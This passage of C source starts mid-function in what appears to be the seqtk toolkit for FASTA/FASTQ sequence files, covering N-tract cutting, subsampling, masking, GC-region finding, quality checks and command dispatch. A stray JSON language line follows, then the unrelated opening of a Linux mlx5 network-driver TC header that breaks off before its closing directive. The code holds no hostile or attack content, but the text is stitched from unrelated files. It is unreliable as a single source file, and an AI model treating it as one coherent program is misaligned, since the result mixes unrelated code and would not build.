score = 0; e = max = -1; for (i = k; i < ks->seq.l && score >= 0; ++i) { /* forward */ if (seq_nt16_table[(int)ks->seq.s[i]] == 15) ++score; else score -= cutN_nonN_penalty; if (score > max) max = score, e = i; } score = 0; b = max = -1; for (i = e; i >= 0 && score >= 0; --i) { /* backward */ if (seq_nt16_table[(int)ks->seq.s[i]] == 15) ++score; else score -= cutN_nonN_penalty; if (score > max) max = score, b = i; } if (e + 1 - b >= cutN_min_N_tract) { *begin = b; *end = e + 1; return *end; } k = e + 1; } else ++k; } return -1; } static void print_seq(FILE *fpout, const kseq_t *ks, int begin, int end) { int i; if (begin >= end) return; // FIXME: why may this happen? Understand it! fprintf(fpout, "%c%s:%d-%d", ks->qual.l? 
'@' : '>', ks->name.s, begin+1, end); for (i = begin; i < end && i < ks->seq.l; ++i) { if ((i - begin)%60 == 0) fputc('\n', fpout); fputc(ks->seq.s[i], fpout); } fputc('\n', fpout); if (ks->qual.l == 0) return; fputs("+\n", fpout); for (i = begin; i < end && i < ks->qual.l; ++i) { if ((i - begin)%60 == 0) fputc('\n', fpout); fputc(ks->qual.s[i], fpout); } fputc('\n', fpout); } int stk_cutN(int argc, char *argv[]) { int c, l, gap_only = 0; gzFile fp; kseq_t *ks; while ((c = getopt(argc, argv, "n:p:g")) >= 0) { switch (c) { case 'n': cutN_min_N_tract = atoi(optarg); break; case 'p': cutN_nonN_penalty = atoi(optarg); break; case 'g': gap_only = 1; break; default: return 1; } } if (argc == optind) { fprintf(stderr, "\n"); fprintf(stderr, "Usage: seqtk cutN [options] <in.fa>\n\n"); fprintf(stderr, "Options: -n INT min size of N tract [%d]\n", cutN_min_N_tract); fprintf(stderr, " -p INT penalty for a non-N [%d]\n", cutN_nonN_penalty); fprintf(stderr, " -g print gaps only, no sequence\n\n"); return 1; } fp = (strcmp(argv[optind], "-") == 0)? gzdopen(fileno(stdin), "r") : gzopen(argv[optind], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } ks = kseq_init(fp); while ((l = kseq_read(ks)) >= 0) { int k = 0, begin = 0, end = 0; while (find_next_cut(ks, k, &begin, &end) >= 0) { if (begin != 0) { if (gap_only) printf("%s\t%d\t%d\n", ks->name.s, begin, end); else print_seq(stdout, ks, k, begin); } k = end; } if (!gap_only) print_seq(stdout, ks, k, l); } kseq_destroy(ks); gzclose(fp); return 0; } int stk_hrun(int argc, char *argv[]) { gzFile fp; kseq_t *ks; int min_len = 7, l = 0, c = 0, beg = 0, i; if (argc == optind) { fprintf(stderr, "Usage: seqtk hrun <in.fa> [minLen=%d]\n", min_len); return 1; } if (argc == optind + 2) min_len = atoi(argv[optind+1]); fp = (strcmp(argv[optind], "-") == 0)? 
gzdopen(fileno(stdin), "r") : gzopen(argv[optind], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } ks = kseq_init(fp); while (kseq_read(ks) >= 0) { c = ks->seq.s[0]; l = 1; beg = 0; for (i = 1; i < ks->seq.l; ++i) { if (ks->seq.s[i] != c) { if (l >= min_len) printf("%s\t%d\t%d\t%c\n", ks->name.s, beg, beg + l, c); c = ks->seq.s[i]; l = 1; beg = i; } else ++l; } } if (l >= min_len) printf("%s\t%d\t%d\t%c\n", ks->name.s, beg, beg + l, c); kseq_destroy(ks); gzclose(fp); return 0; } /* sample */ static void cpy_kstr(kstring_t *dst, const kstring_t *src) { if (src->l == 0) return; if (src->l + 1 > dst->m) { dst->m = src->l + 1; kroundup32(dst->m); dst->s = realloc(dst->s, dst->m); } dst->l = src->l; memcpy(dst->s, src->s, src->l + 1); } static void cpy_kseq(kseq_t *dst, const kseq_t *src) { cpy_kstr(&dst->name, &src->name); cpy_kstr(&dst->seq, &src->seq); cpy_kstr(&dst->qual, &src->qual); cpy_kstr(&dst->comment, &src->comment); } int stk_sample(int argc, char *argv[]) { int c, twopass = 0; uint64_t i, num = 0, n_seqs = 0; double frac = 0.; gzFile fp; kseq_t *seq; krand_t *kr = 0; while ((c = getopt(argc, argv, "2s:")) >= 0) if (c == 's') kr = kr_srand(atol(optarg)); else if (c == '2') twopass = 1; if (optind + 2 > argc) { fprintf(stderr, "\n"); fprintf(stderr, "Usage: seqtk sample [-2] [-s seed=11] <in.fa> <frac>|<number>\n\n"); fprintf(stderr, "Options: -s INT RNG seed [11]\n"); fprintf(stderr, " -2 2-pass mode: twice as slow but with much reduced memory\n\n"); return 1; } frac = atof(argv[optind+1]); if (frac >= 1.0) num = (uint64_t)(frac + .499), frac = 0.; else if (twopass) { fprintf(stderr, "[W::%s] when sampling a fraction, option -2 is ignored.", __func__); twopass = 0; } if (kr == 0) kr = kr_srand(11); if (!twopass) { // the streaming version kseq_t *buf = 0; if (num > 0) buf = calloc(num, sizeof(kseq_t)); if (num > 0 && buf == NULL) { fprintf(stderr, "[E::%s] Could not allocate enough memory for %" 
PRIu64 " sequences. Exiting...\n", __func__, num); free(kr); return 1; } fp = strcmp(argv[optind], "-")? gzopen(argv[optind], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); n_seqs = 0; while (kseq_read(seq) >= 0) { double r = kr_drand(kr); ++n_seqs; if (num) { uint64_t y = n_seqs - 1 < num? n_seqs - 1 : (uint64_t)(r * n_seqs); if (y < num) cpy_kseq(&buf[y], seq); } else if (r < frac) stk_printseq(stdout, seq, UINT_MAX); } for (i = 0; i < num; ++i) { kseq_t *p = &buf[i]; if (p->seq.l) stk_printseq(stdout, p, UINT_MAX); free(p->seq.s); free(p->qual.s); free(p->name.s); } if (buf != NULL) free(buf); } else { uint64_t *buf; khash_t(64) *hash; int absent; if (strcmp(argv[optind], "-") == 0) { fprintf(stderr, "[E::%s] in the 2-pass mode, the input cannot be STDIN.\n", __func__); free(kr); return 1; } // 1st pass buf = malloc(num * 8); for (i = 0; i < num; ++i) buf[i] = UINT64_MAX; fp = gzopen(argv[optind], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); n_seqs = 0; while (kseq_read(seq) >= 0) { double r = kr_drand(kr); uint64_t y; ++n_seqs; y = n_seqs - 1 < num? 
n_seqs - 1 : (uint64_t)(r * n_seqs); if (y < num) buf[y] = n_seqs; } kseq_destroy(seq); gzclose(fp); hash = kh_init(64); for (i = 0; i < num; ++i) kh_put(64, hash, buf[i], &absent); free(buf); // 2nd pass fp = gzopen(argv[optind], "r"); seq = kseq_init(fp); n_seqs = 0; while (kseq_read(seq) >= 0) if (kh_get(64, hash, ++n_seqs) != kh_end(hash)) stk_printseq(stdout, seq, UINT_MAX); kh_destroy(64, hash); } kseq_destroy(seq); gzclose(fp); free(kr); return 0; } /* seq */ void stk_mask(kseq_t *seq, const khash_t(reg) *h, int is_complement, int mask_chr) { unsigned i, j; khiter_t k; k = kh_get(reg, h, seq->name.s); if (k == kh_end(h)) { // not found in the hash table if (is_complement) { if (mask_chr) { for (j = 0; j < seq->seq.l; ++j) seq->seq.s[j] = mask_chr; } else { for (j = 0; j < seq->seq.l; ++j) seq->seq.s[j] = tolower(seq->seq.s[j]); } } } else { reglist_t *p = &kh_val(h, k); if (!is_complement) { for (i = 0; i < p->n; ++i) { unsigned beg = p->a[i]>>32, end = p->a[i]; if (beg >= seq->seq.l) continue; if (end > seq->seq.l) end = seq->seq.l; if (!mask_chr) for (j = beg; j < end; ++j) seq->seq.s[j] = tolower(seq->seq.s[j]); else for (j = beg; j < end; ++j) seq->seq.s[j] = mask_chr; } } else { int8_t *mask = calloc(seq->seq.l, 1); for (i = 0; i < p->n; ++i) { unsigned beg = p->a[i]>>32, end = p->a[i]; if (end >= seq->seq.l) end = seq->seq.l; for (j = beg; j < end; ++j) mask[j] = 1; } if (mask_chr) { for (j = 0; j < seq->seq.l; ++j) if (mask[j] == 0) seq->seq.s[j] = mask_chr; } else { for (j = 0; j < seq->seq.l; ++j) if (mask[j] == 0) seq->seq.s[j] = tolower(seq->seq.s[j]); } free(mask); } } } int stk_seq(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int c, qual_thres = 0, flag = 0, qual_shift = 33, mask_chr = 0, min_len = 0, max_q = 255, fake_qual = -1; unsigned i, line_len = 0; int64_t n_seqs = 0; double frac = 1.; khash_t(reg) *h = 0; krand_t *kr = 0; while ((c = getopt(argc, argv, "N12q:l:Q:aACrn:s:f:M:L:cVUX:SF:")) >= 0) { switch (c) { case 'a': case 'A': flag 
|= 1; break; case 'C': flag |= 2; break; case 'r': flag |= 4; break; case 'c': flag |= 8; break; case '1': flag |= 16; break; case '2': flag |= 32; break; case 'V': flag |= 64; break; case 'N': flag |= 128; break; case 'U': flag |= 256; break; case 'S': flag |= 512; break; case 'M': h = stk_reg_read(optarg); break; case 'n': mask_chr = *optarg; break; case 'Q': qual_shift = atoi(optarg); break; case 'q': qual_thres = atoi(optarg); break; case 'X': max_q = atoi(optarg); break; case 'l': line_len = atoi(optarg); break; case 'L': min_len = atoi(optarg); break; case 's': kr = kr_srand(atol(optarg)); break; case 'f': frac = atof(optarg); break; case 'F': fake_qual = *optarg; break; } } if (kr == 0) kr = kr_srand(11); if (argc == optind && isatty(fileno(stdin))) { fprintf(stderr, "\n"); fprintf(stderr, "Usage: seqtk seq [options] <in.fq>|<in.fa>\n\n"); fprintf(stderr, "Options: -q INT mask bases with quality lower than INT [0]\n"); fprintf(stderr, " -X INT mask bases with quality higher than INT [255]\n"); fprintf(stderr, " -n CHAR masked bases converted to CHAR; 0 for lowercase [0]\n"); fprintf(stderr, " -l INT number of residues per line; 0 for 2^32-1 [%d]\n", line_len); fprintf(stderr, " -Q INT quality shift: ASCII-INT gives base quality [%d]\n", qual_shift); fprintf(stderr, " -s INT random seed (effective with -f) [11]\n"); fprintf(stderr, " -f FLOAT sample FLOAT fraction of sequences [1]\n"); fprintf(stderr, " -M FILE mask regions in BED or name list FILE [null]\n"); fprintf(stderr, " -L INT drop sequences with length shorter than INT [0]\n"); fprintf(stderr, " -F CHAR fake FASTQ quality []\n"); fprintf(stderr, " -c mask complement region (effective with -M)\n"); fprintf(stderr, " -r reverse complement\n"); fprintf(stderr, " -A force FASTA output (discard quality)\n"); fprintf(stderr, " -C drop comments at the header lines\n"); fprintf(stderr, " -N drop sequences containing ambiguous bases\n"); fprintf(stderr, " -1 output the 2n-1 reads only\n"); fprintf(stderr, " 
-2 output the 2n reads only\n"); fprintf(stderr, " -V shift quality by '(-Q) - 33'\n"); fprintf(stderr, " -U convert all bases to uppercases\n"); fprintf(stderr, " -S strip of white spaces in sequences\n"); fprintf(stderr, "\n"); free(kr); return 1; } if (line_len == 0) line_len = UINT_MAX; fp = optind < argc && strcmp(argv[optind], "-")? gzopen(argv[optind], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); qual_thres += qual_shift; while (kseq_read(seq) >= 0) { ++n_seqs; if (seq->seq.l < min_len) continue; // NB: length filter before taking random if (frac < 1. && kr_drand(kr) >= frac) continue; if (flag & 48) { // then choose odd/even reads only if ((flag&16) && (n_seqs&1) == 0) continue; if ((flag&32) && (n_seqs&1) == 1) continue; } if (flag & 512) { // option -S: squeeze out white spaces int k; if (seq->qual.l) { for (i = k = 0; i < seq->seq.l; ++i) if (!isspace(seq->seq.s[i])) seq->qual.s[k++] = seq->qual.s[i]; seq->qual.l = k; } for (i = k = 0; i < seq->seq.l; ++i) if (!isspace(seq->seq.s[i])) seq->seq.s[k++] = seq->seq.s[i]; seq->seq.l = k; } if (seq->qual.l && qual_thres > qual_shift) { if (mask_chr) { for (i = 0; i < seq->seq.l; ++i) if (seq->qual.s[i] < qual_thres || seq->qual.s[i] > max_q) seq->seq.s[i] = mask_chr; } else { for (i = 0; i < seq->seq.l; ++i) if (seq->qual.s[i] < qual_thres || seq->qual.s[i] > max_q) seq->seq.s[i] = tolower(seq->seq.s[i]); } } if (flag & 256) // option -U: convert to uppercases for (i = 0; i < seq->seq.l; ++i) seq->seq.s[i] = toupper(seq->seq.s[i]); if (flag & 1) seq->qual.l = 0; // option -a: fastq -> fasta else if (fake_qual >= 33 && fake_qual <= 127) { if (seq->qual.m < seq->seq.m) { seq->qual.m = seq->seq.m; seq->qual.s = (char*)realloc(seq->qual.s, seq->qual.m); } seq->qual.l = seq->seq.l; memset(seq->qual.s, fake_qual, seq->qual.l); seq->qual.s[seq->qual.l] = 0; } if (flag & 2) seq->comment.l = 0; // option 
-C: drop fasta/q comments if (h) stk_mask(seq, h, flag&8, mask_chr); // masking if (flag & 4) { // option -r: reverse complement int c0, c1; for (i = 0; i < seq->seq.l>>1; ++i) { // reverse complement sequence c0 = comp_tab[(int)seq->seq.s[i]]; c1 = comp_tab[(int)seq->seq.s[seq->seq.l - 1 - i]]; seq->seq.s[i] = c1; seq->seq.s[seq->seq.l - 1 - i] = c0; } if (seq->seq.l & 1) // complement the remaining base seq->seq.s[seq->seq.l>>1] = comp_tab[(int)seq->seq.s[seq->seq.l>>1]]; if (seq->qual.l) { for (i = 0; i < seq->seq.l>>1; ++i) // reverse quality c0 = seq->qual.s[i], seq->qual.s[i] = seq->qual.s[seq->qual.l - 1 - i], seq->qual.s[seq->qual.l - 1 - i] = c0; } } if ((flag & 64) && seq->qual.l && qual_shift != 33) for (i = 0; i < seq->qual.l; ++i) seq->qual.s[i] -= qual_shift - 33; if (flag & 128) { // option -N: drop sequences containing ambiguous bases - Note: this is the last step! for (i = 0; i < seq->seq.l; ++i) if (seq_nt16to4_table[seq_nt16_table[(int)seq->seq.s[i]]] > 3) break; if (i < seq->seq.l) continue; } stk_printseq(stdout, seq, line_len); } kseq_destroy(seq); gzclose(fp); stk_reg_destroy(h); free(kr); return 0; } int stk_gc(int argc, char *argv[]) { int c, is_at = 0, min_l = 20; double frac = 0.6f, xdropoff = 10.0f, q; gzFile fp; kseq_t *seq; while ((c = getopt(argc, argv, "wx:f:l:")) >= 0) { if (c == 'x') xdropoff = atof(optarg); else if (c == 'w') is_at = 1; else if (c == 'f') frac = atof(optarg); else if (c == 'l') min_l = atoi(optarg); } if (optind + 1 > argc) { fprintf(stderr, "Usage: seqtk gc [options] <in.fa>\n"); fprintf(stderr, "Options:\n"); fprintf(stderr, " -w identify high-AT regions\n"); fprintf(stderr, " -f FLOAT min GC fraction (or AT fraction for -w) [%.2f]\n", frac); fprintf(stderr, " -l INT min region length to output [%d]\n", min_l); fprintf(stderr, " -x FLOAT X-dropoff [%.1f]\n", xdropoff); return 1; } q = (1.0f - frac) / frac; fp = strcmp(argv[optind], "-")? 
gzopen(argv[optind], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); while (kseq_read(seq) >= 0) { int i, start = 0, max_i = 0, n_hits = 0, start_hits = 0, max_hits = 0; double sc = 0., max = 0.; for (i = 0; i < seq->seq.l; ++i) { int hit; c = seq_nt16_table[(int)seq->seq.s[i]]; if (is_at) hit = (c == 1 || c == 8 || c == 9); else hit = (c == 2 || c == 4 || c == 6); n_hits += hit; if (hit) { if (sc == 0) start = i, start_hits = n_hits; sc += q; if (sc > max) max = sc, max_i = i, max_hits = n_hits; } else if (sc > 0) { sc += -1.0f; if (sc < 0 || max - sc > xdropoff) { if (max_i + 1 - start >= min_l) printf("%s\t%d\t%d\t%d\n", seq->name.s, start, max_i + 1, max_hits - start_hits + 1); sc = max = 0; i = max_i; } } } if (max > 0. && max_i + 1 - start >= min_l) printf("%s\t%d\t%d\t%d\n", seq->name.s, start, max_i + 1, max_hits - start_hits + 1); } kseq_destroy(seq); gzclose(fp); return 0; } int stk_mergepe(int argc, char *argv[]) { gzFile fp1, fp2; kseq_t *seq[2]; if (argc < 3) { fprintf(stderr, "Usage: seqtk mergepe <in1.fq> <in2.fq>\n"); return 1; } fp1 = strcmp(argv[1], "-")? gzopen(argv[1], "r") : gzdopen(fileno(stdin), "r"); fp2 = strcmp(argv[2], "-")? 
gzopen(argv[2], "r") : gzdopen(fileno(stdin), "r"); if (fp1 == 0 || fp2 == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq[0] = kseq_init(fp1); seq[1] = kseq_init(fp2); while (kseq_read(seq[0]) >= 0) { if (kseq_read(seq[1]) < 0) { fprintf(stderr, "[W::%s] the 2nd file has fewer records.\n", __func__); break; } stk_printseq(stdout, seq[0], 0); stk_printseq(stdout, seq[1], 0); } if (kseq_read(seq[1]) >= 0) fprintf(stderr, "[W::%s] the 1st file has fewer records.\n", __func__); kseq_destroy(seq[0]); gzclose(fp1); kseq_destroy(seq[1]); gzclose(fp2); return 0; } int stk_dropse(int argc, char *argv[]) { gzFile fp; kseq_t *seq, last; if (argc == 1 && isatty(fileno(stdin))) { fprintf(stderr, "Usage: seqtk dropse <in.fq>\n"); return 1; } fp = argc > 1 && strcmp(argv[1], "-")? gzopen(argv[1], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); memset(&last, 0, sizeof(kseq_t)); while (kseq_read(seq) >= 0) { if (last.name.l) { kstring_t *p = &last.name, *q = &seq->name; int is_diff; if (p->l == q->l) { int l = (p->l > 2 && p->s[p->l-2] == '/' && q->s[q->l-2] == '/' && isdigit(p->s[p->l-1]) && isdigit(q->s[q->l-1]))? p->l - 2 : p->l; is_diff = strncmp(p->s, q->s, l); } else is_diff = 1; if (!is_diff) { stk_printseq(stdout, &last, 0); stk_printseq(stdout, seq, 0); last.name.l = 0; } else cpy_kseq(&last, seq); } else cpy_kseq(&last, seq); } kseq_destroy(seq); gzclose(fp); // free last! 
return 0; } static inline int kputc(int c, kstring_t *s) { if (s->l + 1 >= s->m) { char *tmp; s->m = s->l + 2; kroundup32(s->m); if ((tmp = (char*)realloc(s->s, s->m))) s->s = tmp; else return EOF; } s->s[s->l++] = c; s->s[s->l] = 0; return c; } int stk_hpc(int argc, char *argv[]) { gzFile fp; kseq_t *seq; kstring_t str = {0,0,0}; if (argc == 1 && isatty(fileno(stdin))) { fprintf(stderr, "Usage: seqtk hpc <in.fq>\n"); return 1; } fp = argc > 1 && strcmp(argv[1], "-")? gzopen(argv[1], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); while (kseq_read(seq) >= 0) { int i, last; str.l = 0; if (seq->seq.l == 0) continue; for (i = 1, last = 0; i <= seq->seq.l; ++i) { if (i == seq->seq.l || seq->seq.s[last] != seq->seq.s[i]) { kputc(seq->seq.s[last], &str); last = i; } } putchar('>'); puts(seq->name.s); puts(str.s); } kseq_destroy(seq); gzclose(fp); free(str.s); return 0; } int stk_rename(int argc, char *argv[]) { gzFile fp; kseq_t *seq, last; char *prefix = 0; uint64_t n = 1; if (argc == 1 && isatty(fileno(stdin))) { fprintf(stderr, "Usage: seqtk rename <in.fq> [prefix]\n"); return 1; } fp = argc > 1 && strcmp(argv[1], "-")? gzopen(argv[1], "r") : gzdopen(fileno(stdin), "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); if (argc > 2) prefix = argv[2]; memset(&last, 0, sizeof(kseq_t)); while (kseq_read(seq) >= 0) { if (last.name.l) { kstring_t *p = &last.name, *q = &seq->name; int is_diff; if (p->l == q->l) { int l = (p->l > 2 && p->s[p->l-2] == '/' && q->s[q->l-2] == '/' && isdigit(p->s[p->l-1]) && isdigit(q->s[q->l-1]))? 
p->l - 2 : p->l; is_diff = strncmp(p->s, q->s, l); } else is_diff = 1; if (!is_diff) { stk_printseq_renamed(stdout, &last, 0, prefix, n); stk_printseq_renamed(stdout, seq, 0, prefix, n); last.name.l = 0; ++n; } else { stk_printseq_renamed(stdout, &last, 0, prefix, n); ++n; cpy_kseq(&last, seq); } } else cpy_kseq(&last, seq); } if (last.name.l) stk_printseq_renamed(stdout, &last, 0, prefix, n); kseq_destroy(seq); gzclose(fp); // free last! return 0; } int stk_kfreq(int argc, char *argv[]) { gzFile fp; kseq_t *ks; int kmer, i, l, mask; char *nei; if (argc < 2) { fprintf(stderr, "Usage: seqtk kfreq <kmer> <in.fa>\n"); return 1; } // get the k-mer l = strlen(argv[1]); for (i = kmer = 0; i < l; ++i) { int c = seq_nt6_table[(int)argv[1][i]]; assert(c >= 1 && c <= 4); kmer = kmer << 2 | (c - 1); } mask = (1<<2*l) - 1; // get the neighbors nei = calloc(1, 1<<2*l); for (i = 0; i < l; ++i) { int j, x; x = kmer & ~(3 << 2*i); for (j = 0; j < 4; ++j) nei[x|j<<2*i] = 1; } fp = argc == 2 || strcmp(argv[2], "-") == 0? gzdopen(fileno(stdin), "r") : gzopen(argv[2], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } ks = kseq_init(fp); while (kseq_read(ks) >= 0) { int k, x[2], cnt[2], cnt_nei[2], which; x[0] = x[1] = k = cnt[0] = cnt[1] = cnt_nei[0] = cnt_nei[1] = 0; for (i = 0; i < ks->seq.l; ++i) { int c = seq_nt6_table[(int)ks->seq.s[i]]; if (c >= 1 && c <= 4) { x[0] = (x[0] << 2 | (c - 1)) & mask; x[1] = (x[1] >> 2 | (4 - c) << 2*(l-1)); if (k < l) ++k; if (k == l) { if (x[0] == kmer) ++cnt[0]; else if (x[1] == kmer) ++cnt[1]; if (nei[x[0]]) ++cnt_nei[0]; else if (nei[x[1]]) ++cnt_nei[1]; } } else k = 0; } which = cnt_nei[0] > cnt_nei[1]? 
0 : 1; printf("%s\t%ld\t%c\t%d\t%d\n", ks->name.s, ks->seq.l, "+-"[which], cnt_nei[which], cnt[which]); } kseq_destroy(ks); gzclose(fp); return 0; } /* fqchk */ typedef struct { int64_t q[94], b[5]; } posstat_t; static void fqc_aux(posstat_t *p, int pos, int64_t allq[94], double perr[94], int qthres) { int k; int64_t sum = 0, qsum = 0, sum_low = 0; double psum = 0; if (pos <= 0) printf("ALL"); else printf("%d", pos); for (k = 0; k <= 4; ++k) sum += p->b[k]; printf("\t%lld", (long long)sum); for (k = 0; k <= 4; ++k) printf("\t%.1f", 100. * p->b[k] / sum); for (k = 0; k <= 93; ++k) { qsum += p->q[k] * k, psum += p->q[k] * perr[k]; if (k < qthres) sum_low += p->q[k]; } printf("\t%.1f\t%.1f", (double)qsum/sum, -4.343*log((psum+1e-6)/(sum+1e-6))); if (qthres <= 0) { for (k = 0; k <= 93; ++k) if (allq[k] > 0) printf("\t%.2f", 100. * p->q[k] / sum); } else printf("\t%.1f\t%.1f", 100. * sum_low / sum, 100. * (sum - sum_low) / sum); putchar('\n'); } int stk_fqchk(int argc, char *argv[]) { gzFile fp; kseq_t *seq; int i, c, k, max_len = 0, min_len = 0x7fffffff, max_alloc = 0, offset = 33, n_diffQ = 0, qthres = 20; int64_t tot_len = 0, n = 0; double perr[94]; posstat_t all, *pos = 0; while ((c = getopt(argc, argv, "q:")) >= 0) if (c == 'q') qthres = atoi(optarg); if (optind == argc) { fprintf(stderr, "Usage: seqtk fqchk [-q %d] <in.fq>\n", qthres); fprintf(stderr, "Note: use -q0 to get the distribution of all quality values\n"); return 1; } fp = (strcmp(argv[optind], "-") == 0)? gzdopen(fileno(stdin), "r") : gzopen(argv[optind], "r"); if (fp == 0) { fprintf(stderr, "[E::%s] failed to open the input file/stream.\n", __func__); return 1; } seq = kseq_init(fp); for (k = 0; k <= 93; ++k) perr[k] = pow(10., -.1 * k); perr[0] = perr[1] = perr[2] = perr[3] = .5; while (kseq_read(seq) >= 0) { if (seq->qual.l == 0) continue; ++n; tot_len += seq->seq.l; min_len = min_len < seq->seq.l? min_len : seq->seq.l; max_len = max_len > seq->seq.l? 
max_len : seq->seq.l; if (max_len > max_alloc) { int old_max = max_alloc; max_alloc = max_len; kroundup32(max_alloc); pos = realloc(pos, max_alloc * sizeof(posstat_t)); memset(&pos[old_max], 0, (max_alloc - old_max) * sizeof(posstat_t)); } for (i = 0; i < seq->qual.l; ++i) { int q = seq->qual.s[i] - offset; int b = seq_nt6_table[(int)seq->seq.s[i]]; b = b? b - 1 : 4; q = q < 93? q : 93; ++pos[i].q[q]; ++pos[i].b[b]; } } kseq_destroy(seq); gzclose(fp); memset(&all, 0, sizeof(posstat_t)); for (i = 0; i < max_len; ++i) { for (k = 0; k <= 93; ++k) all.q[k] += pos[i].q[k]; for (k = 0; k <= 4; ++k) all.b[k] += pos[i].b[k]; } for (k = n_diffQ = 0; k <= 93; ++k) if (all.q[k]) ++n_diffQ; printf("min_len: %d; max_len: %d; avg_len: %.2f; %d distinct quality values\n", min_len, max_len, (double)tot_len/n, n_diffQ); printf("POS\t#bases\t%%A\t%%C\t%%G\t%%T\t%%N\tavgQ\terrQ"); if (qthres <= 0) { for (k = 0; k <= 93; ++k) if (all.q[k] > 0) printf("\t%%Q%d", k); } else printf("\t%%low\t%%high"); putchar('\n'); fqc_aux(&all, 0, all.q, perr, qthres); for (i = 0; i < max_len; ++i) fqc_aux(&pos[i], i + 1, all.q, perr, qthres); free(pos); return 0; } /* main function */ static int usage() { fprintf(stderr, "\n"); fprintf(stderr, "Usage: seqtk <command> <arguments>\n"); fprintf(stderr, "Version: 1.3-r115-dirty\n\n"); fprintf(stderr, "Command: seq common transformation of FASTA/Q\n"); fprintf(stderr, " comp get the nucleotide composition of FASTA/Q\n"); fprintf(stderr, " sample subsample sequences\n"); fprintf(stderr, " subseq extract subsequences from FASTA/Q\n"); fprintf(stderr, " fqchk fastq QC (base/quality summary)\n"); fprintf(stderr, " mergepe interleave two PE FASTA/Q files\n"); fprintf(stderr, " trimfq trim FASTQ using the Phred algorithm\n\n"); fprintf(stderr, " hety regional heterozygosity\n"); fprintf(stderr, " gc identify high- or low-GC regions\n"); fprintf(stderr, " mutfa point mutate FASTA at specified positions\n"); fprintf(stderr, " mergefa merge two FASTA/Q files\n"); 
fprintf(stderr, " famask apply a X-coded FASTA to a source FASTA\n"); fprintf(stderr, " dropse drop unpaired from interleaved PE FASTA/Q\n"); fprintf(stderr, " rename rename sequence names\n"); fprintf(stderr, " randbase choose a random base from hets\n"); fprintf(stderr, " cutN cut sequence at long N\n"); fprintf(stderr, " gap get the gap locations\n"); fprintf(stderr, " listhet extract the position of each het\n"); fprintf(stderr, " hpc homopolyer-compressed sequence\n"); fprintf(stderr, "\n"); return 1; } int main(int argc, char *argv[]) { if (argc == 1) return usage(); if (strcmp(argv[1], "comp") == 0) return stk_comp(argc-1, argv+1); else if (strcmp(argv[1], "fqchk") == 0) return stk_fqchk(argc-1, argv+1); else if (strcmp(argv[1], "hety") == 0) return stk_hety(argc-1, argv+1); else if (strcmp(argv[1], "gc") == 0) return stk_gc(argc-1, argv+1); else if (strcmp(argv[1], "subseq") == 0) return stk_subseq(argc-1, argv+1); else if (strcmp(argv[1], "mutfa") == 0) return stk_mutfa(argc-1, argv+1); else if (strcmp(argv[1], "mergefa") == 0) return stk_mergefa(argc-1, argv+1); else if (strcmp(argv[1], "mergepe") == 0) return stk_mergepe(argc-1, argv+1); else if (strcmp(argv[1], "dropse") == 0) return stk_dropse(argc-1, argv+1); else if (strcmp(argv[1], "randbase") == 0) return stk_randbase(argc-1, argv+1); else if (strcmp(argv[1], "cutN") == 0) return stk_cutN(argc-1, argv+1); else if (strcmp(argv[1], "gap") == 0) return stk_gap(argc-1, argv+1); else if (strcmp(argv[1], "listhet") == 0) return stk_listhet(argc-1, argv+1); else if (strcmp(argv[1], "famask") == 0) return stk_famask(argc-1, argv+1); else if (strcmp(argv[1], "trimfq") == 0) return stk_trimfq(argc-1, argv+1); else if (strcmp(argv[1], "hrun") == 0) return stk_hrun(argc-1, argv+1); else if (strcmp(argv[1], "sample") == 0) return stk_sample(argc-1, argv+1); else if (strcmp(argv[1], "seq") == 0) return stk_seq(argc-1, argv+1); else if (strcmp(argv[1], "kfreq") == 0) return stk_kfreq(argc-1, argv+1); else if 
(strcmp(argv[1], "rename") == 0) return stk_rename(argc-1, argv+1); else if (strcmp(argv[1], "split") == 0) return stk_split(argc-1, argv+1); else if (strcmp(argv[1], "hpc") == 0) return stk_hpc(argc-1, argv+1); else { fprintf(stderr, "[main] unrecognized command '%s'. Abort!\n", argv[1]); return 1; } }
{ "language": "C" }
/* SPDX-License-Identifier: GPL-2.0 OR Linux-OpenIB */
/* Copyright (c) 2020 Mellanox Technologies. */

/*
 * mlx5e representor TC (traffic-classifier) offload interface.
 *
 * Declares the entry points the representor netdev code uses to hook into
 * TC offload.  When CONFIG_MLX5_CLS_ACT is disabled, every entry point is
 * replaced below by a static-inline no-op stub so callers compile and run
 * unchanged without the classifier-action support.
 */

#ifndef __MLX5_EN_REP_TC_H__
#define __MLX5_EN_REP_TC_H__

#include <linux/skbuff.h>
#include "en_tc.h"
#include "en_rep.h"

#if IS_ENABLED(CONFIG_MLX5_CLS_ACT)

/* Per-representor TC state setup/teardown. */
int mlx5e_rep_tc_init(struct mlx5e_rep_priv *rpriv);
void mlx5e_rep_tc_cleanup(struct mlx5e_rep_priv *rpriv);

/* Register/unregister interest in netdevice notifier events. */
int mlx5e_rep_tc_netdevice_event_register(struct mlx5e_rep_priv *rpriv);
void mlx5e_rep_tc_netdevice_event_unregister(struct mlx5e_rep_priv *rpriv);

/* Enable/disable TC offload handling on an already-initialized priv. */
void mlx5e_rep_tc_enable(struct mlx5e_priv *priv);
void mlx5e_rep_tc_disable(struct mlx5e_priv *priv);
